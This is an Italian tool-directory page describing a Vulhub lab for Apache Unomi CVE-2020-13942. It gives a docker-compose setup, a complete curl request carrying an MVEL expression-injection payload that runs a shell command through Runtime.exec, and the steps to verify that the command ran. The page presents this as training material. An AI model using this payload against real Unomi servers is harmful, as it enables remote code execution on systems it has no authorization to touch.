Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-13942byVulHub — Ambiente di laboratorio passo-passo ed exploit per Apache Unomi CVE-2020-13942, che dimostra l'iniezione del linguaggio di espressione MVEL che porta all'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Ambiente di laboratorio passo-passo ed exploit per Apache Unomi CVE-2020-13942, che dimostra l'iniezione del linguaggio di espressione MVEL che porta all'esecuzione remota di codice.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-13942byVulHub


Apache Unomi Expression Language Injection RCE (CVE-2020-13942)

Descrizione

Questa vulnerabilità consente l'esecuzione di comandi arbitrari su sistemi che eseguono Apache Unomi versione 1.5.1, sfruttando l'iniezione del linguaggio di espressione MVEL.

Pagina del progetto

GitHub - Vulhub - Unomi CVE-2020-13942


Configurazione dell'ambiente

Docker Compose file (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

Avvio dei container

Esegui i container con il seguente comando:

root@kitploit:~
docker compose up -d

Esecuzione dell'exploit

Comando da eseguire da Kali

Lanciare la seguente richiesta POST utilizzando curl:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

Verifica dell'exploit

Accesso al container

Accedi al container per verificare la creazione del file:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

Controllo del risultato

Verifica la presenza della cartella pluto:

root@kitploit:~
hsperfdata_root  pluto

Se il file pluto è presente, significa che l'exploit è riuscito.


Note di sicurezza

Questa vulnerabilità consente l'esecuzione di comandi arbitrari. Utilizza questi test solo in ambienti controllati e a scopo di studio o verifica. Sfruttare vulnerabilità in ambienti non autorizzati è illegale.

root@kitploit:~

---
Scarica lo strumento